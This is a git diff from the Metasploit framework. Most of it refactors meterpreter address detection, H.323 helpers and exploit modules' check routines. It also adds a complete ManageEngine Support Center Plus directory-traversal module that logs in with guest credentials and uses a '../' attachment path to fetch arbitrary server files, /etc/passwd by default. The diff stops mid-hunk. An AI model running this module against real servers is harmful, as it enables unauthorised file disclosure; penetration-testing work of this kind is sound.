diff --git a/.travis.yml b/.travis.yml index 6e4c13c878..6c815d2340 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,9 +1,11 @@ language: ruby +env: MSF_SPOTCHECK_RECENT=1 before_install: - rake --version - sudo apt-get update -qq - sudo apt-get install -qq libpcap-dev before_script: + - ./tools/msftidy.rb - cp config/database.yml.travis config/database.yml - bundle exec rake --version - bundle exec rake db:create diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb index 7b6c6d713e..e40d56439d 100644 --- a/lib/msf/base/sessions/meterpreter.rb +++ b/lib/msf/base/sessions/meterpreter.rb @@ -303,52 +303,20 @@ class Meterpreter < Rex::Post::Meterpreter::Client safe_info.gsub!(/[\x00-\x08\x0b\x0c\x0e-\x19\x7f-\xff]+/n,"_") self.info = safe_info - # Enumerate network interfaces to detect IP - ifaces = self.net.config.get_interfaces().flatten rescue [] - routes = self.net.config.get_routes().flatten rescue [] - shost = self.session_host + hobj = nil - # Try to match our visible IP to a real interface - # TODO: Deal with IPv6 addresses - found = !!(ifaces.find {|i| i.addrs.find {|a| a == shost } }) - nhost = nil - hobj = nil - - if Rex::Socket.is_ipv4?(shost) and not found - - # Try to find an interface with a default route - default_routes = routes.select{ |r| r.subnet == "0.0.0.0" || r.subnet == "::" } - default_routes.each do |r| - ifaces.each do |i| - bits = Rex::Socket.net2bitmask( i.netmask ) rescue 32 - rang = Rex::Socket::RangeWalker.new( "#{i.ip}/#{bits}" ) rescue nil - if rang and rang.include?( r.gateway ) - nhost = i.ip - break - end - end - break if nhost - end - - # Find the first non-loopback address - if not nhost - iface = ifaces.select{|i| i.ip != "127.0.0.1" and i.ip != "::1" } - if iface.length > 0 - nhost = iface.first.ip - end - end - end + nhost = find_internet_connected_address + original_session_host = self.session_host # If we found a better IP address for this session, change it up # only handle cases where the DB is not connected here - if not (framework.db and framework.db.active) + if !(framework.db && framework.db.active) self.session_host = nhost end - # The rest of this requires a database, so bail if it's not # there - return if not (framework.db and framework.db.active) + return if !(framework.db && framework.db.active) ::ActiveRecord::Base.connection_pool.with_connection { wspace = framework.db.find_workspace(workspace) @@ -384,18 +352,18 @@ class Meterpreter < Rex::Post::Meterpreter::Client if nhost framework.db.report_note({ :type => "host.nat.server", - :host => shost, + :host => original_session_host, :workspace => wspace, :data => { :info => "This device is acting as a NAT gateway for #{nhost}", :client => nhost }, :update => :unique_data }) - framework.db.report_host(:host => shost, :purpose => 'firewall' ) + framework.db.report_host(:host => original_session_host, :purpose => 'firewall' ) framework.db.report_note({ :type => "host.nat.client", :host => nhost, :workspace => wspace, - :data => { :info => "This device is traversing NAT gateway #{shost}", :server => shost }, + :data => { :info => "This device is traversing NAT gateway #{original_session_host}", :server => original_session_host }, :update => :unique_data }) framework.db.report_host(:host => nhost, :purpose => 'client' ) @@ -470,6 +438,60 @@ protected attr_accessor :rstream # :nodoc: + # Rummage through this host's routes and interfaces looking for an + # address that it uses to talk to the internet. + # + # @see Rex::Post::Meterpreter::Extensions::Stdapi::Net::Config#get_interfaces + # @see Rex::Post::Meterpreter::Extensions::Stdapi::Net::Config#get_routes + # @return [String] The address from which this host reaches the + # internet, as ASCII. e.g.: "192.168.100.156" + def find_internet_connected_address + + ifaces = self.net.config.get_interfaces().flatten rescue [] + routes = self.net.config.get_routes().flatten rescue [] + + # Try to match our visible IP to a real interface + found = !!(ifaces.find { |i| i.addrs.find { |a| a == session_host } }) + nhost = nil + + # If the host has no address that matches what we see, then one of + # us is behind NAT so we have to look harder. + if !found + # Grab all routes to the internet + default_routes = routes.select { |r| r.subnet == "0.0.0.0" || r.subnet == "::" } + + default_routes.each do |route| + # Now try to find an interface whose network includes this + # Route's gateway, which means it's the one the host uses to get + # to the interweb. + ifaces.each do |i| + # Try all the addresses this interface has configured + addr_and_mask = i.addrs.zip(i.netmasks).find do |addr, netmask| + bits = Rex::Socket.net2bitmask( netmask ) + range = Rex::Socket::RangeWalker.new("#{addr}/#{bits}") rescue nil + + !!(range && range.valid? && range.include?(route.gateway)) + end + if addr_and_mask + nhost = addr_and_mask[0] + break + end + end + break if nhost + end + + if !nhost + # Find the first non-loopback address + non_loopback = ifaces.find { |i| i.ip != "127.0.0.1" && i.ip != "::1" } + if non_loopback + nhost = non_loopback.ip + end + end + end + + nhost + end + end end diff --git a/lib/msf/core/post/common.rb b/lib/msf/core/post/common.rb index e6cce966f8..cab869d366 100644 --- a/lib/msf/core/post/common.rb +++ b/lib/msf/core/post/common.rb @@ -2,6 +2,28 @@ module Msf::Post::Common + def rhost + case session.type + when 'meterpreter' + session.sock.peerhost + when 'shell' + session.session_host + end + end + + def rport + case session.type + when 'meterpreter' + session.sock.peerport + when 'shell' + session.session_port + end + end + + def peer + "#{rhost}:#{rport}" + end + # # Checks if the remote system has a process with ID +pid+ # diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb index 1d148f7028..73f3b781b2 100644 --- a/lib/msf/core/post/file.rb +++ b/lib/msf/core/post/file.rb @@ -98,14 +98,13 @@ module Msf::Post::File return !!(stat) else if session.platform =~ /win/ - f = cmd_exec("cmd.exe /C IF exist \"#{path}\" ( echo true )") + # XXX else f = session.shell_command_token("test -e '#{path}' && echo true") + return false if f.nil? or f.empty? + return false unless f =~ /true/ + return true end - - return false if f.nil? or f.empty? - return false unless f =~ /true/ - return true end end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb index d006221b30..70b1ef4d7e 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb @@ -49,10 +49,9 @@ class Config get_interfaces().each(&block) end - # # Returns an array of network interfaces with each element. # - # being an Interface + # @return [Array] def get_interfaces request = Packet.create_request('stdapi_net_config_get_interfaces') ifaces = [] diff --git a/modules/auxiliary/scanner/h323/h323_version.rb b/modules/auxiliary/scanner/h323/h323_version.rb index 3fd8b5392e..2f06559fd6 100644 --- a/modules/auxiliary/scanner/h323/h323_version.rb +++ b/modules/auxiliary/scanner/h323/h323_version.rb @@ -51,7 +51,17 @@ class Metasploit3 < Msf::Auxiliary conf_guid = Rex::Text.rand_text(16) call_guid = Rex::Text.rand_text(16) - pkt_setup = h323_setup_call(caller_name, h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid) + pkt_setup = h323_setup_call({ + :caller_name => caller_name, + :h323_id => h323_id, + :vendor_id => vendor_id, + :callee_host => callee_host, + :callee_port => callee_port, + :caller_host => caller_host, + :caller_port => caller_port, + :conf_guid => conf_guid, + :call_guid => call_guid + }) res = sock.put(pkt_setup) rescue nil if not res @@ -88,7 +98,10 @@ class Metasploit3 < Msf::Auxiliary end # Make sure the call was shut down cleanly - pkt_release = h323_release_call(caller_name, h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid) + pkt_release = h323_release_call({ + :caller_name => caller_name, + :call_guid => call_guid + }) sock.put(pkt_release) rescue nil # End timeout block @@ -352,7 +365,16 @@ class Metasploit3 < Msf::Auxiliary # # This is ugly. Doing it properly requires a PER capable ASN.1 encoder, which is overkill for this task # - def create_user_info(h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid) + def create_user_info(opts = {}) + h323_id = opts[:h323_id] + vendor_id = opts[:vendor_id] + callee_host = opts[:callee_host] + callee_port = opts[:callee_port] + caller_host = opts[:caller_host] + caller_port = opts[:caller_port] + conf_guid = opts[:conf_guid] + call_guid = opts[:call_guid] + buff = "\x05" # Protocol descriminator: X.208/X.209 coded user information buff << "\x20\xa8\x06\x00\x08\x91\x4a\x00\x06\x01\x40\x02" @@ -539,7 +561,10 @@ class Metasploit3 < Msf::Auxiliary "\x02\x80\x01\x00" end - def h323_release_call(caller_name, h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid) + def h323_release_call(opts = {}) + caller_name = opts[:caller_name] + call_guid = opts[:call_guid] + encap_tpkt(3, encap_q225_release( create_ie_display(caller_name) + @@ -550,13 +575,32 @@ class Metasploit3 < Msf::Auxiliary ) end - def h323_setup_call(caller_name, h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid) + def h323_setup_call(opts = {}) + caller_name = opts[:caller_name] + h323_id = opts[:h323_id] + vendor_id = opts[:vendor_id] + callee_host = opts[:callee_host] + callee_port = opts[:callee_port] + caller_host = opts[:caller_host] + caller_port = opts[:caller_port] + conf_guid = opts[:conf_guid] + call_guid = opts[:call_guid] + encap_tpkt(3, encap_q225_setup( create_ie_bearer_capability() + create_ie_display(caller_name) + create_ie_user_user( - create_user_info( h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid ) + create_user_info({ + :h323_id => h323_id, + :vendor_id => vendor_id, + :callee_host => callee_host, + :callee_port => callee_port, + :caller_host => caller_host, + :caller_port => caller_port, + :conf_guid => conf_guid, + :call_guid => call_guid + }) ) ) ) diff --git a/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb new file mode 100644 index 0000000000..4dd71493e3 --- /dev/null +++ b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb @@ -0,0 +1,160 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info={}) + super(update_info(info, + 'Name' => "ManageEngine Support Center Plus Directory Traversal", + 'Description' => %q{ + This module exploits a directory traversal vulnerability found in ManageEngine + Support Center Plus build 7916 and lower. The module will create a support ticket + as a normal user, attaching a link to a file on the server. By requesting our + own attachment, it's possible to retrieve any file on the filesystem with the same + privileges as Support Center Plus is running. On Windows this is always with SYSTEM + privileges. + }, + 'License' => MSF_LICENSE, + 'Author' => 'xistence ', # Discovery, Metasploit module + 'References' => + [ + ['EDB', '31262'], + ['OSVDB', '102656'], + ['BID', '65199'], + ['URL', 'http://packetstormsecurity.com/files/124975/ManageEngine-Support-Center-Plus-7916-Directory-Traversal.html'] + ], + 'DisclosureDate' => "Jan 28 2014" + )) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, 'The base path to the Support Center Plus installation', '/']), + OptString.new('USER', [true, 'The Support Center Plus user', 'guest']), + OptString.new('PASS', [true, 'The Support Center Plus password', 'guest']), + OptString.new('FILE', [true, 'The Support Center Plus password', '/etc/passwd']) + ], self.class) + end + + def run_host(ip) + uri = target_uri.path + peer = "#{ip}:#{rport}" + + vprint_status("#{peer} - Retrieving cookie") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, "") + }) + + if res and res.code == 200 + session = res.get_cookies + else + vprint_error("#{peer} - Server returned #{res.code.to_s}") + end + + vprint_status("#{peer} - Logging in as user [ #{datastore['USER']} ]") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, "j_security_check"), + 'cookie' => session, + 'vars_post' => + { + 'j_username' => datastore['USER'], + 'j_password' => datastore['PASS'], + 'logonDomainName' => 'undefined', + 'sso_status' => 'false', + 'loginButton' => 'Login' + } + }) + + if res and res.code == 302 + vprint_status("#{peer} - Login succesful") + else + vprint_error("#{peer} - Login was not succesful!") + return + end + + randomname = Rex::Text.rand_text_alphanumeric(10) + vprint_status("#{peer} - Creating ticket with our requested file [ #{datastore['FILE']} ] as attachment") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, "WorkOrder.do"), + 'cookie' => session, + 'vars_post' => + { + 'reqTemplate' => '', + 'prodId' => '0', + 'priority' => '2', + 'reqID' => '2', + 'usertypename' => 'Requester', + 'reqName' => 'Guest', + 'category' => '0', + 'item' => '0', + 'subCategory' => '0', + 'title' => randomname, + 'description' => randomname, + 'MOD_IND' => 'WorkOrder', + 'FORMNAME' => 'WorkOrderForm', + 'attach' => "/../../../../../../../../../../../..#{datastore['FILE']}", + 'attPath' => '', + 'component' => 'Request', + 'attSize' => Rex::Text.rand_text_numeric(8), + 'attachments' => randomname, + 'autoCCList' => '', + 'addWO' => 'addWO' + } + }) + + if res and res.code == 200 + vprint_status("#{peer} - Ticket created") + if (res.body =~ /FileDownload.jsp\?module=Request\&ID=(\d+)\&authKey=(.*)\" class=/) + fileid = $1 + vprint_status("#{peer} - File ID is [ #{fileid} ]") + fileauthkey = $2 + vprint_status("#{peer} - Auth Key is [ #{fileauthkey} ]") + else + vprint_error("#{peer} - File ID and AuthKey not found!") + end + else + vprint_error("#{peer} - Ticket not created due to error!") + return + end + + vprint_status("#{peer} - Requesting file [ #{uri}workorder/FileDownload.jsp?module=Request&ID=#{fileid}&authKey=#{fileauthkey} ]") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, "workorder", "FileDownload.jsp"), + 'vars_get' => + { + 'module' => 'Request', + 'ID' => fileid, + 'authKey' => fileauthkey + } + }) + + # If we don't get a 200 when we request our malicious payload, we suspect + # we don't have a shell, either. Print the status code for debugging purposes. + if res and res.code == 200 + data = res.body + p = store_loot( + 'manageengine.supportcenterplus', + 'application/octet-stream', + ip, + data, + datastore['FILE'] + ) + print_good("#{peer} - [ #{datastore['FILE']} ] loot stored as [ #{p} ]") + else + vprint_error("#{peer} - Server returned #{res.code.to_s}") + end + end +end + diff --git a/modules/auxiliary/scanner/printer/printer_download_file.rb b/modules/auxiliary/scanner/printer/printer_download_file.rb index 684ccb39a0..48838f6b1f 100644 --- a/modules/auxiliary/scanner/printer/printer_download_file.rb +++ b/modules/auxiliary/scanner/printer/printer_download_file.rb @@ -20,10 +20,11 @@ class Metasploit4 < Msf::Auxiliary Printer Job Language (PJL) protocol. }, "Author" => [ - "wvu", # This implementation + "wvu", # Rex::Proto::PJL and modules "sinn3r", # RSpec tests - "MC", # Independent implementation - "Myo Soe" # Independent implementation + "MC", # Independent mixin and modules + "Myo Soe", # Independent modules + "Matteo Cantoni " # Independent modules ], "References" => [ ["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"] diff --git a/modules/auxiliary/scanner/printer/printer_env_vars.rb b/modules/auxiliary/scanner/printer/printer_env_vars.rb index 331a8b6658..bad052ed58 100644 --- a/modules/auxiliary/scanner/printer/printer_env_vars.rb +++ b/modules/auxiliary/scanner/printer/printer_env_vars.rb @@ -20,10 +20,11 @@ class Metasploit4 < Msf::Auxiliary Printer Job Language (PJL) protocol. }, "Author" => [ - "wvu", # This implementation + "wvu", # Rex::Proto::PJL and modules "sinn3r", # RSpec tests - "MC", # Independent implementation - "Myo Soe" # Independent implementation + "MC", # Independent mixin and modules + "Myo Soe", # Independent modules + "Matteo Cantoni" # Independent modules ], "References" => [ ["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"] diff --git a/modules/auxiliary/scanner/printer/printer_list_dir.rb b/modules/auxiliary/scanner/printer/printer_list_dir.rb index 6069bdf973..7737ddb2bb 100644 --- a/modules/auxiliary/scanner/printer/printer_list_dir.rb +++ b/modules/auxiliary/scanner/printer/printer_list_dir.rb @@ -20,10 +20,11 @@ class Metasploit4 < Msf::Auxiliary Printer Job Language (PJL) protocol. }, "Author" => [ - "wvu", # This implementation + "wvu", # Rex::Proto::PJL and modules "sinn3r", # RSpec tests - "MC", # Independent implementation - "Myo Soe" # Independent implementation + "MC", # Independent mixin and modules + "Myo Soe", # Independent modules + "Matteo Cantoni " # Independent modules ], "References" => [ ["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"] diff --git a/modules/auxiliary/scanner/printer/printer_list_volumes.rb b/modules/auxiliary/scanner/printer/printer_list_volumes.rb index 982c4c8295..39298917ce 100644 --- a/modules/auxiliary/scanner/printer/printer_list_volumes.rb +++ b/modules/auxiliary/scanner/printer/printer_list_volumes.rb @@ -20,10 +20,11 @@ class Metasploit4 < Msf::Auxiliary Printer Job Language (PJL) protocol. }, "Author" => [ - "wvu", # This implementation + "wvu", # Rex::Proto::PJL and modules "sinn3r", # RSpec tests - "MC", # Independent implementation - "Myo Soe" # Independent implementation + "MC", # Independent mixin and modules + "Myo Soe", # Independent modules + "Matteo Cantoni " # Independent modules ], "References" => [ ["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"] diff --git a/modules/auxiliary/scanner/printer/printer_ready_message.rb b/modules/auxiliary/scanner/printer/printer_ready_message.rb index 0a5fce4670..bddc1646aa 100644 --- a/modules/auxiliary/scanner/printer/printer_ready_message.rb +++ b/modules/auxiliary/scanner/printer/printer_ready_message.rb @@ -20,10 +20,11 @@ class Metasploit4 < Msf::Auxiliary a set of printers using the Printer Job Language (PJL) protocol. }, "Author" => [ - "wvu", # This implementation + "wvu", # Rex::Proto::PJL and modules "sinn3r", # RSpec tests - "MC", # Independent implementation - "Myo Soe" # Independent implementation + "MC", # Independent mixin and modules + "Myo Soe", # Independent modules + "Matteo Cantoni " # Independent modules ], "References" => [ ["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"] diff --git a/modules/auxiliary/scanner/printer/printer_version_info.rb b/modules/auxiliary/scanner/printer/printer_version_info.rb index a6d0dcbf90..f1018fdf88 100644 --- a/modules/auxiliary/scanner/printer/printer_version_info.rb +++ b/modules/auxiliary/scanner/printer/printer_version_info.rb @@ -20,10 +20,11 @@ class Metasploit4 < Msf::Auxiliary Printer Job Language (PJL) protocol. }, "Author" => [ - "wvu", # This implementation + "wvu", # Rex::Proto::PJL and modules "sinn3r", # RSpec tests - "MC", # Independent implementation - "Myo Soe" # Independent implementation + "MC", # Independent mixin and modules + "Myo Soe", # Independent modules + "Matteo Cantoni " # Independent modules ], "References" => [ ["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"] diff --git a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb index 2c6954b241..ea1e397fbf 100644 --- a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb @@ -106,15 +106,15 @@ class Metasploit3 < Msf::Exploit::Remote if rel.length > 0 if rel[0,2] == 'rc' if rel[2,rel.length].to_i >= 3 - status = CheckCode::Vulnerable + status = CheckCode::Appears end else - status = CheckCode::Vulnerable + status = CheckCode::Appears end end when '3' # 1.3.3+ defaults to vulnerable (until >= 1.3.3c) - status = CheckCode::Vulnerable + status = CheckCode::Appears if rel.length > 0 if rel[0,2] != 'rc' and rel[0,1] > 'b' status = CheckCode::Safe diff --git a/modules/exploits/irix/lpd/tagprinter_exec.rb b/modules/exploits/irix/lpd/tagprinter_exec.rb index 2a22ac30e4..b7f26527e2 100644 --- a/modules/exploits/irix/lpd/tagprinter_exec.rb +++ b/modules/exploits/irix/lpd/tagprinter_exec.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (resp =~ /IRIX/) - print_status("Response: #{resp.strip}") + vprint_status("Response: #{resp.strip}") return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe diff --git a/modules/exploits/linux/ftp/proftp_sreplace.rb b/modules/exploits/linux/ftp/proftp_sreplace.rb index 866f6f0ec1..b8fa872f5c 100644 --- a/modules/exploits/linux/ftp/proftp_sreplace.rb +++ b/modules/exploits/linux/ftp/proftp_sreplace.rb @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote ret = connect # We just want the banner to check against our targets.. - print_status("FTP Banner: #{banner.strip}") + vprint_status("FTP Banner: #{banner.strip}") status = CheckCode::Safe @@ -129,16 +129,16 @@ class Metasploit3 < Msf::Exploit::Remote relv = rel.slice!(0,1) case relv when '2' - status = CheckCode::Vulnerable + status = CheckCode::Appears when '3' # 1.3.x before 1.3.1 is vulnerable - status = CheckCode::Vulnerable + status = CheckCode::Appears if rel.length > 0 if rel.to_i > 0 status = CheckCode::Safe else - status = CheckCode::Vulnerable + status = CheckCode::Appears end end end diff --git a/modules/exploits/linux/ftp/proftp_telnet_iac.rb b/modules/exploits/linux/ftp/proftp_telnet_iac.rb index b18b7cc67e..5d69d3b95e 100644 --- a/modules/exploits/linux/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/linux/ftp/proftp_telnet_iac.rb @@ -274,7 +274,7 @@ class Metasploit3 < Msf::Exploit::Remote banner = sock.get_once || '' # We just want the banner to check against our targets.. - print_status("FTP Banner: #{banner.strip}") + vprint_status("FTP Banner: #{banner.strip}") status = CheckCode::Safe if banner =~ /ProFTPD (1\.3\.[23][^ ])/i @@ -286,15 +286,15 @@ class Metasploit3 < Msf::Exploit::Remote if rel.length > 0 if rel[0,2] == 'rc' if rel[2,rel.length].to_i >= 3 - status = CheckCode::Vulnerable + status = CheckCode::Appears end else - status = CheckCode::Vulnerable + status = CheckCode::Appears end end when '3' # 1.3.3+ defaults to vulnerable (until >= 1.3.3c) - status = CheckCode::Vulnerable + status = CheckCode::Appears if rel.length > 0 if rel[0,2] != 'rc' and rel[0,1] > 'b' status = CheckCode::Safe diff --git a/modules/exploits/linux/games/ut2004_secure.rb b/modules/exploits/linux/games/ut2004_secure.rb index d056df5613..ef2f097f2e 100644 --- a/modules/exploits/linux/games/ut2004_secure.rb +++ b/modules/exploits/linux/games/ut2004_secure.rb @@ -92,23 +92,23 @@ class Metasploit3 < Msf::Exploit::Remote vers = ut_version if (not vers) - print_status("Could not detect Unreal Tournament Server") - return + vprint_status("Could not detect Unreal Tournament Server") + return Exploit::CheckCode::Unknown end print_status("Detected Unreal Tournament Server Version: #{vers}") if (vers =~ /^(3120|3186|3204)$/) - print_status("This system appears to be exploitable") + vprint_status("This system appears to be exploitable") return Exploit::CheckCode::Appears end if (vers =~ /^(2...)$/) - print_status("This system appears to be running UT2003") + vprint_status("This system appears to be running UT2003") return Exploit::CheckCode::Detected end - print_status("This system appears to be patched") + vprint_status("This system appears to be patched") return Exploit::CheckCode::Safe end diff --git a/modules/exploits/linux/http/astium_sqli_upload.rb b/modules/exploits/linux/http/astium_sqli_upload.rb index 3fa37da1a3..d6f0676960 100644 --- a/modules/exploits/linux/http/astium_sqli_upload.rb +++ b/modules/exploits/linux/http/astium_sqli_upload.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect Astium") + vprint_status("#{peer} - Trying to detect Astium") res = send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb index d636f73a92..4584c79a40 100644 --- a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb +++ b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_cgi({ 'uri' => '/comm.asp' }) if res and res.code == 200 and res.body =~ /var modelname="DIR-605L"/ and res.headers["Server"] and res.headers["Server"] =~ /Boa\/0\.94\.14rc21/ - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/linux/http/hp_system_management.rb b/modules/exploits/linux/http/hp_system_management.rb index e6a4f2c311..1029c220a0 100644 --- a/modules/exploits/linux/http/hp_system_management.rb +++ b/modules/exploits/linux/http/hp_system_management.rb @@ -71,9 +71,12 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => "/cpqlogin.htm" }) - if res and res.code == 200 and res.body =~ /"HP System Management Homepage v(.*)"/ + if res.nil? + vprint_error("Connection timed out") + return Exploit::CheckCode::Unknown + elsif res.code == 200 and res.body =~ /"HP System Management Homepage v(.*)"/ version = $1 - return Exploit::CheckCode::Vulnerable if version <= "7.1.1.1" + return Exploit::CheckCode::Appears if version <= "7.1.1.1" end return Exploit::CheckCode::Safe diff --git a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb index 7940a3ddce..26d1c3c07b 100644 --- a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb @@ -57,11 +57,12 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => '/HNAP1/' }) rescue ::Rex::ConnectionError - return Exploit::CheckCode::Safe + vprint_error("A connection error has occured") + return Exploit::CheckCode::Unknown end if res and res.code == 200 and res.body =~ /WRT110<\/ModelName>/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/linux/http/mutiny_frontend_upload.rb b/modules/exploits/linux/http/mutiny_frontend_upload.rb index 3ea050d12a..1b9ffd0f7b 100644 --- a/modules/exploits/linux/http/mutiny_frontend_upload.rb +++ b/modules/exploits/linux/http/mutiny_frontend_upload.rb @@ -128,12 +128,17 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, "interface", "/"), }) - if res and res.body =~ /var currentMutinyVersion = "Version ([0-9\.-]*)/ + if res.nil? + vprint_error("Connection timed out") + return Exploit::CheckCode::Unknown + end + + if res.body =~ /var currentMutinyVersion = "Version ([0-9\.-]*)/ version = $1 end if version and version >= "5" and version <= "5.0-1.07" - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/linux/http/nginx_chunked_size.rb b/modules/exploits/linux/http/nginx_chunked_size.rb index 0b2d857f61..8ca4131d31 100644 --- a/modules/exploits/linux/http/nginx_chunked_size.rb +++ b/modules/exploits/linux/http/nginx_chunked_size.rb @@ -88,10 +88,11 @@ class Metasploit4 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end # diff --git a/modules/exploits/linux/http/openfiler_networkcard_exec.rb b/modules/exploits/linux/http/openfiler_networkcard_exec.rb index 6b811fb3bd..b1542c492e 100644 --- a/modules/exploits/linux/http/openfiler_networkcard_exec.rb +++ b/modules/exploits/linux/http/openfiler_networkcard_exec.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # retrieve software version from login page - print_status("#{peer} - Sending check") + vprint_status("#{peer} - Sending check") begin res = send_request_cgi({ 'uri' => '/' @@ -83,10 +83,10 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown end - return Exploit::CheckCode::Unknown - + return Exploit::CheckCode::Safe end def on_new_session(client) diff --git a/modules/exploits/linux/http/pineapp_livelog_exec.rb b/modules/exploits/linux/http/pineapp_livelog_exec.rb index 4d13b0dcbd..f76a7463ba 100644 --- a/modules/exploits/linux/http/pineapp_livelog_exec.rb +++ b/modules/exploits/linux/http/pineapp_livelog_exec.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote 'nsserver' => Rex::Text.encode_base64("127.0.0.1") } }) - if res and res.code == 200 and res.body =~ /NS Query result for 127.0.0.1/ + if res and res.code == 200 and res.body =~ /NS Query result for 127\.0\.0\.1/ return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb index 5266a5669e..693c4f991f 100644 --- a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb +++ b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end def target_smt_x9_214 diff --git a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb index 5ed6644527..2e8d2c1359 100644 --- a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb +++ b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote end def check - print_status("#{peer} - Trying to detect installed version") + vprint_status("#{peer} - Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -80,21 +80,21 @@ class Metasploit3 < Msf::Exploit::Remote model = $~[:model].sub(/^[a-z]+/) { |s| s[0].upcase } model = "DS#{model}" unless model =~ /^[A-Z]/ else - print_status("#{peer} - Detection failed") + vprint_status("#{peer} - Detection failed") return Exploit::CheckCode::Unknown end - print_status("#{peer} - Model #{model} with version #{version}-#{build} detected") + vprint_status("#{peer} - Model #{model} with version #{version}-#{build} detected") case version when '4.0' - return Exploit::CheckCode::Vulnerable if build < '2259' + return Exploit::CheckCode::Appears if build < '2259' when '4.1' - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears when '4.2' - return Exploit::CheckCode::Vulnerable if build < '3243' + return Exploit::CheckCode::Appears if build < '3243' when '4.3' - return Exploit::CheckCode::Vulnerable if build < '3810' + return Exploit::CheckCode::Appears if build < '3810' return Exploit::CheckCode::Detected if build == '3810' end diff --git a/modules/exploits/linux/http/wanem_exec.rb b/modules/exploits/linux/http/wanem_exec.rb index 1a64359162..e50c966fed 100644 --- a/modules/exploits/linux/http/wanem_exec.rb +++ b/modules/exploits/linux/http/wanem_exec.rb @@ -69,7 